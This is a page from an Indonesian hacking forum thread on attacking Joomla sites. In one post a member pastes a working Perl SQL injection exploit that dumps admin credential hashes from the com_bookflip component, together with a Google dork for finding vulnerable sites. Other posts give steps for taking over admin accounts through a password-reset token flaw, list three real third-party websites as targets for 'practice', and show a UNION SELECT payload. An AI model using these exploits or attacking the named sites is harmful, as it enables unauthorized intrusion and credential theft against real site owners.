Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

joomla hack

http://xcode.or.id/forum/viewtopic.php?f=99&t=35102

Page 4 of 5

Re: joomla hack

Posted: Wed Jul 01, 2009 4:07 pm
by j.gladiator
meski q lum nyoba tapi... q cuma pengen share disini.... (sumber : milw0rm)

#!/usr/bin/perl -w

#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
#---------------------------------------
#[!] <name>BookFlip</name>
#[!] <creationDate>Juin 2008</creationDate>
#[!] <author>FCI F-Cimag-In</author>
#[!] <copyright>Ce composant est distribué gratuitement.</copyright>
#[!] <authorEmail>[email protected]</authorEmail>
#[!] <authorUrl>www.f-cimag-in.com</authorUrl>
#[!] <version>2.1</version>
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################

system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Kosova Hackers Group (KHG-CREW) #\n\n";
print "\t ###############################################################\n\n";
print "\t # - Joomla com_bookflip(book_id)Remote SQL Injection Vuln #\n\n";
print "\t # - R.I.P redc00de #\n\n";
print "\t # - Cod3d by boom3rang #\n\n";
print "\t ###############################################################\n\n";
use LWP::UserAgent;
print "\nTarget page:[http://wwww.localhost/pathdir/]: ";
chomp(my $target=<STDIN>);
#Column Name
$c_n="concat(username,0x3a,password)";
#Table_name
$t_n="jos_users";
$U="-9999+UNION+SELECT+";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/index.php?option=com_bookflip&book_id=".$U."1,".$c_n.",3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from/**/".$t_n."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n\n";
print "# Veprimi mbaroi me sukses(Congratulations)! #\n\n";
}
else{print "\n[-] Veprimi Deshtoi (Not Found)...\n";
}

########################
# - Proud 2 be Albanian
# - Proud 2 be Muslim
########################

# milw0rm.com [2009-06-29]

Re: joomla hack

Posted: Sat Jul 04, 2009 12:13 am
by zarskycrew
j.gladiator wrote:pertama masuk k google.com
ke2 masukin ini
inurl:option=com_user
lanjut..
target:
contohnya : >>>>>http://situstarget.com/index.php?option ... view=reset<<<<<
di rubah jd
>>>>>http://situstarget.com/index.php?option ... ut=confirm<<<<<<
setelah itu akan munjul token
isi dengan ' <----------- mengapa harus tanda ---------->'
dah coba ajah yaw..
dah setelah itu akan muncul password dan very password
isi dengan sesuka hati
setelah itu login
dengan username Admin password nya yang td km isi
setelah itu
admin udah jd milik kau...
selesai.....

klo dah reset password, pas coba login gagal mulu ..
apa username nya salah gt ya ?
cara nya cari username nya gmn ya ??

Re: joomla hack

Posted: Sat Jul 04, 2009 9:02 pm
by Quick_5ilv3r
keren mas tapi dah lawas.. :D

Re: joomla hack

Posted: Wed Jul 15, 2009 1:16 pm
by mahaja
yup....

caranya seh bener ....

tapi thu dah lama mas...

tapi ya gpp lah kita saling share j...
tetep bereksperimen...

Re: joomla hack

Posted: Mon Jul 20, 2009 9:45 am
by vodork
wew nice too :D :D
tapi udah lama jugga tuh :roll: :roll:
lanjut cari yang baru :twisted: :twisted:

lock

Re: joomla hack

Posted: Mon Jul 20, 2009 11:50 am
by shad.hckr
site: Joomla
dork: com_category
method: SQLi
credits: milw0rm

Code: Select all

http://www.epsau.com.au/index.php?option=com_category&task=loadCategory&catid=12

http://www.hendrygroup.com.au/index.php?option=com_category&task=loadCategory&catid=11

http://www.hgau.com.au/index.php?option=com_category&task=loadCategory&catid=131
ada target nih.. bisa dapet password juga.. sekalian praktek SQLi ya..
ni Joomla tapi manfaatin celah SQL. kalo belum tau caranya tinggal search di forum ini ya kk..

Re: joomla hack

Posted: Sun Aug 23, 2009 8:49 pm
by Sniffer_Vandal
Seru-Seru Lanjut" Q pengen belajar SQL injc
Uwh dimana yw belajarnya...?
Biar cepat Belajarnya...?
uwh pengen bisa SQL Inject...
hehehehehehe....

Re: joomla hack

Posted: Mon Aug 24, 2009 12:42 pm
by .::Z10R::.
Sniffer_Vandal wrote:Seru-Seru Lanjut" Q pengen belajar SQL injc
Uwh dimana yw belajarnya...?
Biar cepat Belajarnya...?
uwh pengen bisa SQL Inject...
hehehehehehe....
pengen belajar kok mo instan :)

Re: joomla hack

Posted: Mon Oct 19, 2009 8:11 pm
by Sniffer_Vandal
.::Z10R::. wrote:
Sniffer_Vandal wrote:Seru-Seru Lanjut" Q pengen belajar SQL injc
Uwh dimana yw belajarnya...?
Biar cepat Belajarnya...?
uwh pengen bisa SQL Inject...
hehehehehehe....
pengen belajar kok mo instan :)
Emangnya MIE instan...?
hahahahahahahahahaha.....

Nice brow just kidding...!!!
kita belajar pelan2...
we baru cuma bisa nampilin version aja
setelah nampilin versionnya gmana yw...?

contoh : index.php?id=-100+union+all+select 1,2,@@version,4--

nach setelah itu apa lagi...?
ada yang bisa bantu gak?

Re: joomla hack

Posted: Fri Jan 15, 2010 8:47 am
by blackxnovo
pusing!
gak jelas penjelasanx!
mas... tlg diperjelas dong.
makasih sebelumx.
All times are UTC+07:00
Page 4 of 5
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/